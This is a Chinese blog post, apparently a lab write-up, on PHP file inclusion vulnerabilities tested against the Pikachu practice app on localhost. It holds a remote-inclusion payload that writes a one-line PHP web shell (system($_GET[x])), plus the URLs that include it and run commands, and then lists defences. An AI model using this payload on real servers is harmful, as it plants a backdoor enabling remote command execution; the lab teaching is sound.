WebWall-07.File Inclusion(文件包含)

最新推荐文章于 2024-07-23 19:05:38 发布
最新推荐文章于 2024-07-23 19:05:38 发布
阅读量174 收藏
点赞数
分类专栏: # WebWall 文章标签: php 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a13554371686/article/details/126542981
版权

概述

​ 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直 接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。

​ 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含 的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则 可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同 的配置环境,文件包含漏洞分为如下两种情况:

  1. 本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于 服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而 读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
  2. 远程文 件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说 的,准备挂彩。 但RFI的利用条件较为苛刻,需要php.ini中进行配置

但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = On
allow_url_include = On

在这里插入图片描述

在这里插入图片描述

两个配置选项均需要为On,才能远程包含文件成功。

但是,在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。 所以远程文件包含的利用条件比较苛刻.

测试实验

local 漏洞

正常提交

在这里插入图片描述

http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4

这里进行修改

可以寻找正确的路径打开对应的本地文件

在这里插入图片描述

remote漏洞

首先在一台服务器上面把下面的代码运行起来

##远程文件##
<?php
$myfile fopen("test.php","w");
$txt = '<?php system($_GET[x]);?>';
fwrite($myfile,$txt);
fclose($myfile);
?>

在这里插入图片描述

执行之前

在这里插入图片描述

然后执行远程文件

在这里插入图片描述

http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu/test/yijuhua.txt&submit=%E6%8F%90%E4%BA%A4

执行之后

在这里插入图片描述

后面就可以调用非法命令了

http://127.0.0.1/pikachu/vul/fileinclude/yijuhua.php?x=ipconfig

在这里插入图片描述

防范措施

  1. 过滤各种 ../../,http://,https://
  2. 配置
allow_url_fopen = off
allow_url_include = off
magic_quotes_gpc=on
  1. 通过白名单策略,仅允许包含运行指定的文件,其他的都禁止
凯歌响起
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebWall - Advanced Privacy Protection-crx插件
04-03
WebWall是可用的最强大的隐私保护工具。 它阻止跟踪器监视您并加快网站访问速度。 WebWall是最先进的在线隐私保护工具。 它向您显示哪些网站具有跟踪您的跟踪器,并自动阻止这些跟踪器以保护您的隐私和数据。 为什么...
Array_负载均衡(APV系列)产品详细介绍
04-11
1.5. Webwall 功能 24 1.6. 带宽管理(QOS) 24 1.7.集群( Cluster)功能 26 二、Array APV解决方案优势 26 2.1. 降低成本,保护投资 27 2.2. 可扩展性 27 2.3. 实用性和可靠性 27 2.4. 安全性 28 2.5. 可管理性 28...
WEB漏洞——XXE&XML
holen_的博客
03-24 4008
先上小迪的思维导图 概念 XML:传输和存储数据格式类型 XXE:XML外部实体注入漏洞(XML External Entity Injection) XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 上图中的DTD是实体,DTD中的内容就是内部实体的一个声明,图中声明了note作为一个父标签,其中to,from…是note的子标签。 而这张图便是DTD外部实体声明,外部有一个.dtd文件通过SYSTEM"
WebWall-09.Unsafe file uploads(不安全的文件上传)
凯歌响起的博客
08-31 319
文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像,附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断,比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式重命名后存储在指定的目录,如果说后台对上传的文件没有进行任何的安全判断或者判断的条件不够严谨,则攻击者可能会上传一些恶意的文件,从而导致服务器权限被获取。...
WebWall-08.Unsafe file downloads(不安全的文件下载)
凯歌响起的博客
08-30 125
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。...
WebWall-13.其他安全问题
凯歌响起的博客
09-04 210
web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过“…/”这样的手段让后台打开或者执行一些其他的文件。从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞。由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。...
Array TM网络数据流安全管理解决方案
07-09
Array TM网络数据流安全管理解决方案是一种综合的网络管理平台,它将多种基本的网络功能整合在一起,包括4-7层服务器负载均衡、SSL加速、高性能数据缓存、Webwall安全、动态内容压缩、链接负载均衡和集群等。...
密码学原理精解【9】
应用数学
07-19 1387
设K是一个确定长度的随机二元密钥,用K来生成Nr个轮密钥(也叫子密钥)K1K2KNrK1K2...KNr,轮密钥的列表(K1K2KNrK1K2...KNr)就是密钥编排方案,该方案由K经过一个固定的、公开的算法生成。轮函数g由轮密钥K′和当前状态wr−1作为它的两个输入下一状态为wrgwr−1Kr轮函数g由轮密钥K'和当前状态w^{r-1}作为它的两个输入,\\下一状态为w^r=g(w^{r-1},K^r)
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 449
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 590
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
PHP项目开发流程概述
api77的博客
07-19 566
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 728
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 850
文件名:
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 626
CTFWP,ctfshow-web42
网络芯片(又称为PHY网络芯片)
最新发布
czy8787475的博客
07-23 132
网络芯片(又称为PHY网络芯片)
BGP选路之Next Hop
txs1269928052的博客
07-23 509
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 928
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
Array APV系列:全面的负载均衡与应用交付解决方案
- **Webwall功能**:可能涉及网络安全过滤和保护。 - **带宽管理(Quality of Service, QoS)**:确保不同服务的优先级和带宽分配。 - **集群功能(Cluster)**:支持设备之间的协同工作,增强整体性能和可用性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值